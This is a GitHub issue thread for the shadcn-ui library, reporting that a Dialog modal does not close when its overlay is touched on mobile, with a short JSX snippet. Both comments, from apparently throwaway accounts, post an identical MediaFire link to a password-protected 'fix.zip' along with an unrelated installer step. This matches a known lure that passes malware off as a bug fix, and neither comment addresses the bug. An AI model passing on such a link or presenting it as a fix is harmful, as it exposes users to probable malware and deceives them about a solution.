### ISSUE TITLE
[bug]: Modal does not shut down when overlay touch on mobile.

### ISSUE THREAD

**Issue by WooGi1020** [shadcn-ui/ui#4639]
### Describe the bug

```
 <DialogOverlay
      onClick={(e: React.MouseEvent<HTMLDivElement>) => {
        e.stopPropagation();
      }}
    />
```
    
- In order to prevent the spread of the event, e.stopPropagation() has been applied to the overlay and the onClick event itself has been confirmed to operate through touch, but the modal does not end.

### Affected component/components

dialog

### How to reproduce

1. Create modals through dialog components.
2. Touch the dialog overlap area on the mobile.

### System Info

```bash
mobile
```

### Before submitting

- [X] I've made research efforts and searched the documentation
- [X] I've searched for existing issues

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
